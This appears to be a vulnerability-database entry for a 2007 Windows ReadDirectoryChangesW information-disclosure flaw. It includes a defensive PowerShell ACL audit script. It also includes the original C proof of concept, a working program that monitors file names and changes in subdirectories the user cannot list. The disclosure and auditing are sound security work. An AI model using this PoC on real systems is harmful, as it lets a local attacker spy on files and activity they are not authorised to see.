Microsoft ReadDirectoryChangesW Information Disclosure Vulnerability

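Vulnerability ID: 1112284 | Vulnerability type: Permissions, privileges and access control
Published: 2007-02-22 | Updated: 2007-02-22
CVE ID: CVE-2007-0843 | CNNVD-ID: CNNVD-200702-435
Platform: Windows | CVSS score: 4.6
|Vulnerability sources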
https://www.exploit-db.com/exploits/29630
https://www.securityfocus.com/bid/22664
https://cxsecurity.com/issue/WLB-2007020085
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200702-435
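|Vulnerability details
The ReadDirectoryChangesW API function on Microsoft Windows 2000, XP, Server 2003, and Vista does not check authorization on child objects. A local user can therefore bypass authorization by opening a directory to which they have LIST (READ) access and using ReadDirectoryChangesW to monitor changes to files for which they have no LIST permission. An attacker can use this to obtain file names, access times, and other sensitive information.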
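An added audit sketch in PowerShell (not part of the original advisory and not the PoC author's code): because the description says change notifications cover child objects the caller cannot list, it reports subdirectories under a root where a principal is granted LIST on the root but not on the child. `D:\Shares` and `BUILTIN\Users` are placeholder values, the function names are made up for this example, and group membership and generic-rights ACEs are not expanded.

```powershell
# Added example: ACL audit for directories whose restricted children sit under a
# root that a principal can open with LIST access. Names and paths are placeholders.
$ListRight   = [System.Security.AccessControl.FileSystemRights]::ListDirectory
$InheritOnly = [System.Security.AccessControl.PropagationFlags]::InheritOnly

function Test-ListGranted {
    param(
        [System.Security.AccessControl.FileSystemSecurity]$Acl,
        [string]$Principal
    )
    $allowed = $false
    foreach ($rule in $Acl.Access) {
        # Only explicit matches on the named principal (assumption: no group expansion).
        if ($rule.IdentityReference.Value -ne $Principal) { continue }
        # Inherit-only ACEs apply to children, not to this directory itself.
        if (($rule.PropagationFlags -band $InheritOnly) -eq $InheritOnly) { continue }
        if (($rule.FileSystemRights -band $ListRight) -ne $ListRight) { continue }
        # A matching Deny ACE wins over any Allow ACE.
        if ($rule.AccessControlType -eq 'Deny') { return $false }
        $allowed = $true
    }
    return $allowed
}

function Find-WatchExposedDirectory {
    param([string]$Root, [string]$Principal)
    # If the principal cannot list the root, it cannot open it for monitoring.
    if (-not (Test-ListGranted (Get-Acl -LiteralPath $Root) $Principal)) { return }
    Get-ChildItem -LiteralPath $Root -Directory -Recurse -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            $acl = Get-Acl -LiteralPath $_.FullName
            if (-not (Test-ListGranted $acl $Principal)) {
                # Child withholds LIST, yet sits inside a subtree the principal can watch.
                [pscustomobject]@{
                    Path              = $_.FullName
                    InheritanceBroken = $acl.AreAccessRulesProtected
                }
            }
        }
}

Find-WatchExposedDirectory -Root 'D:\Shares' -Principal 'BUILTIN\Users'
```

Each reported path is a candidate for moving out from under the broadly listable root, or for tightening LIST on the root itself.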
|Exploit (EXP)
source: http://www.securityfocus.com/bid/22664/info

Microsoft Windows is prone to a local information-disclosure vulnerability.

A local attacker may leverage this issue to gain access to potentially sensitive information about user permissions and accessed files. Information gained may aid in further attacks against the affected computer. 

/*
	Monitors directory changes
	(c) 2006-2007 Vladimir Dubrovin, 3APA3A
	http://securityvulns.com/
	http://securityvulns.ru/
*/

#include <windows.h>
#include <stdio.h>
#include <string.h>


int main(int argc, char *argv[]){
	HANDLE hDir;
	/* DWORD array: ReadDirectoryChangesW requires a DWORD-aligned buffer */
	DWORD buf[256];
	FILE_NOTIFY_INFORMATION * fn;
	DWORD read;
	const WCHAR * action = NULL;

	if(argc != 2) {
		printf(
"Usage: %s <directory_path>\n"
" Monitor directory changes with all subdirectories\n"
" For any files, including ones you have no access\n"
" (as on January, 2007)\n"
"(c) Vladimir Dubrovin, 3APA3A\n"
" http://securityvulns.com\n"
" http://securityvulns.ru\n"
"This approach is not reliable and should not be used for audit and another critical operations.\n",
 argv[0]);
		return 1;
	}

	/* argv[] holds ANSI strings, so call the A variants explicitly */
	CreateDirectoryA(argv[1], 0);
	/* Only LIST access on the top-level directory is requested */
	hDir = CreateFileA(
	  argv[1],
	  FILE_LIST_DIRECTORY,
	  FILE_SHARE_READ|FILE_SHARE_DELETE,
	  NULL,
	  OPEN_EXISTING,
	  FILE_FLAG_BACKUP_SEMANTICS,
	  NULL
	);
	if(hDir == INVALID_HANDLE_VALUE){
		fprintf(stdout, "Failed to open dir\n");
		return 2;
	}
	for(;;){
		if(!ReadDirectoryChangesW(
			hDir,
			buf,
			sizeof(buf),
			TRUE,	/* bWatchSubtree: report changes in all subdirectories */
			FILE_NOTIFY_CHANGE_DIR_NAME | FILE_NOTIFY_CHANGE_FILE_NAME | FILE_NOTIFY_CHANGE_LAST_ACCESS |
				FILE_NOTIFY_CHANGE_ATTRIBUTES | FILE_NOTIFY_CHANGE_SIZE | FILE_NOTIFY_CHANGE_LAST_WRITE |
				FILE_NOTIFY_CHANGE_CREATION | FILE_NOTIFY_CHANGE_SECURITY,
			&read,
			NULL,
			NULL
		)) {
			fprintf(stderr, "Failed to read directory changes\n");
			break;
		}
		/* Zero bytes returned: more changes than the buffer could hold, nothing to parse */
		if(read == 0) continue;
		for (fn = (FILE_NOTIFY_INFORMATION *)buf; ;){
			switch(fn->Action){
			case FILE_ACTION_ADDED:
				action = L"added";
				break;
			case FILE_ACTION_REMOVED:
				action = L"removed";
				break;
			case FILE_ACTION_MODIFIED:
				action = L"accessed/modified";
				break;
			case FILE_ACTION_RENAMED_OLD_NAME:
				action = L"renamed (old name)";
				break;
			case FILE_ACTION_RENAMED_NEW_NAME:
				action = L"renamed (new name)";
				break;
			default:
				action = L"(unknown)";
			}
			/* FileName is not null-terminated: print exactly FileNameLength bytes
			   instead of writing a terminator over the next record */
			wprintf(L"File %ls: %.*ls\n", action,
				(int)(fn->FileNameLength / sizeof(WCHAR)), fn->FileName);
			if(!fn->NextEntryOffset) break;
			fn = (FILE_NOTIFY_INFORMATION *)(((char *)fn) + fn->NextEntryOffset);
		}
	}
	CloseHandle(hDir);
	return 0;
}
|Affected products
Microsoft Windows XP Tablet PC Edition SP2
Microsoft Windows XP Tablet PC Edition SP1
Microsoft Windows XP Tablet PC Edition
Microsoft Windows XP Professional x64 Edition
Microsoft Wind
|References

Source: XF
Name: win-readdirectory-information-disclosure(32644)
Link: http://xforce.iss.net/xforce/xfdb/32644
Source: BID
Name: 22664
Link: http://www.securityfocus.com/bid/22664
Source: BUGTRAQ
Name: 20070222 Microsoft Windows 2000/XP/2003/Vista ReadDirectoryChangesW informaton leak
Link: http://www.securityfocus.com/archive/1/archive/1/460899/100/0/threaded
Source: BUGTRAQ
Name: 20070222 Re[2]: [Full-disclosure] Microsoft Windows 2000/XP/2003/Vista ReadDirectoryChangesW informaton leak
Link: http://www.securityfocus.com/archive/1/archive/1/460887/100/0/threaded
Source: VUPEN
Name: ADV-2007-0701
Link: http://www.frsirt.com/english/advisories/2007/0701
Source: MISC
Link: http://securityvulns.com/advisories/readdirectorychanges.asp
Source: SREASON
Name: 2282
Link: http://securityreason.com/securityalert/2282
Source: SECUNIA
Name: 24245
Link: http://secunia.com/advisories/24245
Source: OSVDB
Name: 33474
Link: http://osvdb.org/33474
Source: FULLDISC
Name: 20070222 Microsoft Windows 2000/XP/2003/Vista ReadDirectoryChangesW informaton leak
Link: http://lists.grok.org.uk/pipermail/full-disclosure/2007-February/052